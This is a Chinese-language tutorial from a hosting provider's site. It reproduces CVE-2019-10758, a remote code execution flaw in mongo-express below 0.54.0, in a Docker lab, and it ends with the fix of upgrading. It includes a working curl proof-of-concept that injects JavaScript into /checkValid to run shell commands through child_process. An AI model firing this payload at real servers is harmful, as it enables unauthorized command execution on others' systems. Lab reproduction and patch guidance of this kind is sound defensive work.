91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Mongo-express遠程代碼怎樣執行CVE-2019-10758復現

發布時間:2021-12-20 18:08:24 來源:億速云 閱讀:211 作者:柒染 欄目:大數據

Mongo-express遠程代碼怎樣執行CVE-2019-10758復現,針對這個問題,這篇文章詳細介紹了相對應的分析和解答,希望可以幫助更多想解決這個問題的小伙伴找到更簡單易行的方法。

0x01 簡介    
Mongo-express是MongoDB的數據庫管理工具,類似Navicat對應Mysql的關系,其使用Node.js,Express和Bootstrap3編寫的基于Web的MongoDB圖形化管理界面。    


0x02 漏洞概述      
   

漏洞問題出在lib/bson.js中的toBSON()函數中,路由 /checkValid 從外部接收輸入,并調用了存在 RCE 漏洞的代碼,由此存在被攻擊的風險。


0x03 影響版本    
mongo-express < 0.54.0    


0x04 環境搭建

使用docker首先搭建MongoDB數據庫      
     
docker run --name MyMongo -d mongo:3.2
     


再搭建一個存在漏洞版本得express并連接到上面得MongoDB      
     
docker run -it --rm -p 8081:8081 --link MyMongo:mongo mongo-express:0.49
     


看到以下信息即可說明搭建成功

     

Mongo-express遠程代碼怎樣執行CVE-2019-10758復現


訪問本機8081端口,可以看到Mongo-express界面      
     


Mongo-express遠程代碼怎樣執行CVE-2019-10758復現


當然也可以直接使用vulhub      
     


git clone https://github.com/vulhub/vulhub.gitcd vulhub/mongo-express/CVE-2019-10758docker-compose up -d
     


0x05 漏洞復現

使用網上Poc
   
curl 'http://localhost:8081/checkValid' -H 'Authorization: Basic YWRtaW46cGFzcw==' --data 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("echo Str1am > file.txt")'
   


Mongo-express遠程代碼怎樣執行CVE-2019-10758復現


看到返回Valid且MongoDB界面返回200即為成功


Mongo-express遠程代碼怎樣執行CVE-2019-10758復現


查看創建的文件    


Mongo-express遠程代碼怎樣執行CVE-2019-10758復現


0x06 修復方式

升級至0.54.0以上版本


關于Mongo-express遠程代碼怎樣執行CVE-2019-10758復現問題的解答就分享到這里了,希望以上內容可以對大家有一定的幫助,如果你還有很多疑惑沒有解開,可以關注億速云行業資訊頻道了解更多相關知識。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

无为县| 河北省| 东兰县| 西畴县| 潮州市| 武宁县| 堆龙德庆县| 青冈县| 宝坻区| 安达市| 威海市| 达州市| 盐池县| 兴隆县| 榆树市| 江阴市| 成武县| 郧西县| 福建省| 内乡县| 织金县| 廊坊市| 吐鲁番市| 中卫市| 库车县| 陇川县| 赫章县| 孝义市| 萨嘎县| 日照市| 车致| 临武县| 潜山县| 通渭县| 鱼台县| 淮滨县| 大荔县| 浮山县| 龙南县| 陇南市| 兴隆县|